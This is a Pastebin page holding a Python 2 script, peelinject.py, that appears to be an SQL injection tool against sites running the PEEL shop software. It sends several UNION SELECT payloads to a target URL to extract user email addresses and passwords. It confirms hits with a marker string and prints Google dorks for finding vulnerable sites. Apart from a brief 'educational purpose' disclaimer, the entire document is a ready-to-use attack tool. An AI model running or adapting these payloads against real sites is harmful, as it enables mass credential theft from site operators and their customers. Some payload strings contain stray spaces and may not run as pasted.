Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # This was written for educational purpose and pentest only. Use it at your own risk.
- # Author will be not responsible for any damage!
- # !!! Special greetz for my friend sinner_01 !!!
- # Toolname : peelinject.py
- # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
- # Version : 0.1
- # greetz for d3hydr8, rsauron, low1z, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org
- # More vuln in next version
- # So many vuln sites to find
- #
- import sys, os, re, time, urllib2
- if sys.platform == 'linux' or sys.platform == 'linux2':
- clearing = 'clear'
- else:
- clearing = 'cls'
- os.system(clearing)
- def logo():
- print "\n|---------------------------------------------------------------|"
- print "| b4ltazar[@]gmail[dot]com |"
- print "| 02/2011 peelinject.py v.0.1 |"
- print "| |"
- print "|---------------------------------------------------------------|"
- if len(sys.argv) !=2:
- logo()
- print "\nEx: ./peelinject.py http://www.site.com/\n"
- sys.exit(1)
- vulnsql = ["lire/index.php?rubid=1+union+all+select+0,concat_ws(cha r(58),email,mot_passe,0x62616c74617a6172),2+from+ peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+concat_ws(char( 58),email,mot_passe,0x62616c74617a6172),1,2+from+ peel_utilisateurs--", "lire/index.php?rubid=1+and+1=2+union+all+select+concat_ ws(char(58),email,mot_passe,0x62616c74617a6172),1 ,2,3+from+jld_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(cha r(58),email,mot_passe,0x62616c74617a6172)+from+pe el_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(cha r(58),email,mot_passe,0x62616c74617a6172)+from+ut ilisateurs--", "index.php?rubid=1+union+all+select+0,concat_ws(ch ar(58),email,mot_passe,0x62616c74617a6172),2+from +peel_utilisateurs--"]
- site = sys.argv[1]
- if site[:4] != "http":
- site = "http://"+site
- if site [-1] != "/":
- site = site + "/"
- logo()
- print "\n[-] %s" % time.strftime("%X")
- print "\n[+] Target:", site
- print "[+]",len(vulnsql),"Vulns loaded "
- print "[+] Starting scan ...\n"
- for sql in vulnsql:
- print "[+] Checking:" ,site+sql.replace("\n","")
- try:
- target = urllib2.urlopen(site+sql.replace("\n", "")).read()
- if re.findall("baltazar", target):
- print"[!] w00t!,w00t!: ",site+sql.replace("\n", "")
- print
- else:
- print "[-] Sorry, can't exploit "
- print
- except(urllib2.HTTPError):
- pass
- except(KeyboardInterrupt, SystemExit):
- pass
- print "[!] Use this google dork for finding targets\n"
- print "\tinurl:lire/index.php?rubid="
- print "\tinurl:/index.php?rubid=\n"
- print "\n[-] %s" % time.strftime("%X")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement